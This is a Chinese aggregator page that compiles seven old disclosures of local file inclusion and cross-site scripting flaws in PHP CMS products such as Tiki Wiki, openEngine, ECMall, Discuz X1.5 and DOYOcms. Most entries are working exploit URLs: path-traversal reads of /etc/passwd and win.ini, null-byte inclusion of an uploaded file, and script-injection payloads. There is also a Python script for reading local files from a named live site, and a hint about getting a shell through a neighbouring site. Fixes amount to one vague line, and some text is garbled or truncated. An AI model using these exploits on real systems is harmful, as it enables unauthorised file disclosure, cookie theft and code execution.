ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复_跨站漏洞如何修复
刀豆文库小编猜你可能喜欢“跨站漏洞如何修复”。
ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复((整理7篇))由网友“jjq598”投稿提供,下面是小编为大家推荐的ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复,欢迎阅读,希望大家能够喜欢。
篇1:ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复
攻击者可以通过浏览器利用这些问题,利用一个跨站点脚本问题,攻击者必须诱使不知情的用户点击一个恶意的URI。
本地文件漏洞EXP:
网站/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini
跨站脚本漏洞:
网站/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
注:首发孤独浪子,由情整理编辑
防范:
过滤或临时加入通用防注入文件
篇2:openEngine 2.0 100226 本地文件包含和跨站脚本漏洞
openEngine是一款使用PHP开发的Web内容管理系统,openEngine 2.0 100226存在本地包含及跨站脚本漏洞,可能导致敏感信息泄露,
[+]info:
~~~~~~~~~
openEngine 2.0 100226 LFI and XSS Vulnerabilities
Vendor : www.openengine.de
Advisory : secpod.org/blog/?p=152
secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt
Version : openEngine 2.0 100226; other versions may also be affected.
Download : www.openengine.de/download/openengine20_100226.zip
Date : 11/16/
[+]poc:
~~~~~~~~~
* local file inclusion,
localhost/cms/website.php?template=../../../../../../../../etc/passwd%00
* XSS,
alert(document.cookie)localhost/cms/website.php?template=
[+]Reference:
~~~~~~~~~
secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt
出自:BugZone
篇3:mobile9 本地文件包含漏洞
因为他是base64编码的手工测试很麻烦就写了个小工具,高手飘过
import urllib2,sys
import httplib
import base64,time
if len(sys.argv) <= 2:
print \“=\” * 30
print \“mobile9.com local exploit by cnb|rd Qq:441303228\”
print \“Email:Linuxrootkit@gmail.com\”
print \“=\” * 30
print \“usage: \” + sys.argv[0] + \“ hostname \” + \“ local file \”
sys.exit(1)
host = sys.argv[1]
path = sys.argv[2]
file = sys.argv[3]
h = httplib.HTTP(host)
h.putrequest(\“HEAD\”, path)
h.putheader(\“Host\”, host)
h.endheaders
okresp, reason, headers = h.getreply()
print \“=\” * 30
print host + \“ Server Banner is \” + headers.get(\“Server\”)
print \“=\” * 30
print \“Local file to read is \” + file
time = int(time.time())
serverpath = \“/download/content_delivery.php?key=\”
str = str(file) + \“|\” + str(time) + \“|\”
print str
base64file = base64.urlsafe_b64encode(str)
requestpath = serverpath + base64file
print base64file
print requestpath
f = httplib.HTTPConnection(host)
f.request('GET', requestpath)
print f.getresponse().read()
f.close
CSDN博客cnbird2008
篇4:ECMall本地文件包含漏洞
by Ryat
bbs.wolvez.org
respond.php 48行
$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['code']) : '';
...
$plugin_file = ROOT_PATH . '/includes/payment/' . $pay_code . '.php';
if (is_file($plugin_file))
{
include_once($plugin_file);很明显的一个bug
利用的话可以参考flyh4t提到过[bbs.wolvez.org/topic/56/]的一个思路:
可以通过旁注拿个shell,然后写个main.php到/tmp目录下,然后包含之
篇5:Pulse CMS Basic 本地文件包含漏洞及修复
Pulse CMS Basic是一款简单的内容管理系统,Pulse CMS Basic <1.29版中的index.php文件存在本地文件包含漏洞,可能导致敏感信息泄露,
[+]info:
~~~~~~~~~
'Pulse CMS Basic' Local File Inclusion Vulnerability
Mark Stanislav - mark.stanislav@gmail.com
CVE--4330
[+]poc:
~~~~~~~~~
www.example.com/index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
[+]Reference:
~~~~~~~~~
www.uncompiled.com/2010/12/pulse-cms-basic-local-file-inclusion-vulnerability-cve-2010-4330/
篇6:DISCUZX1.5 本地文件包含漏洞漏洞预警
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存,
config_global.php
$_config['cache']['type'] = 'file';
function cachedata($cachenames) {
......
$isfilecache = getglobal('config/cache/type') == 'file';
......
if($isfilecache) {
$lostcaches = array;
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {
$lostcaches[] = $cachename;
}
}
......
}
地址:
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
Authracation has expiried
执行了 api/uc.php 页面代码了,
作者: Jannock
篇7:DOYOcms 本地文件包含漏洞漏洞预警
这是这套CMS ,这个很简洁,。。
这里的$handle_controller = syClass($__controller, null, $GLOBALS['G_DY'][\“controller_path\”].'/'.$__controller.\“.php\”);
接下来往下看
这里的$sdir 没有经过任何过滤来的,然后看下这个import函数
这里直接包含了该文件
require($sfilename);所以结合前面的
$GLOBALS['G_DY'][\“controller_path\”].'/'.$__controller.\“.php\”
$__controller是我们可控的变量,也没有经过任何过滤,我们想可以通过%00截断,然后包含我们上传的文件就达到了目的
这也就是鸡肋的地方了,如果要截断,要保证php版本小于5.4(我自己也记不太清了) 因为高版本的修复了该截断的漏洞,
然后这里要保证魔术常量是关闭的。
下图就是成功包含的图
Exp:
localhost/test/index.php?c=../uploads/2012/06/1.gif%00&a=type&tid=1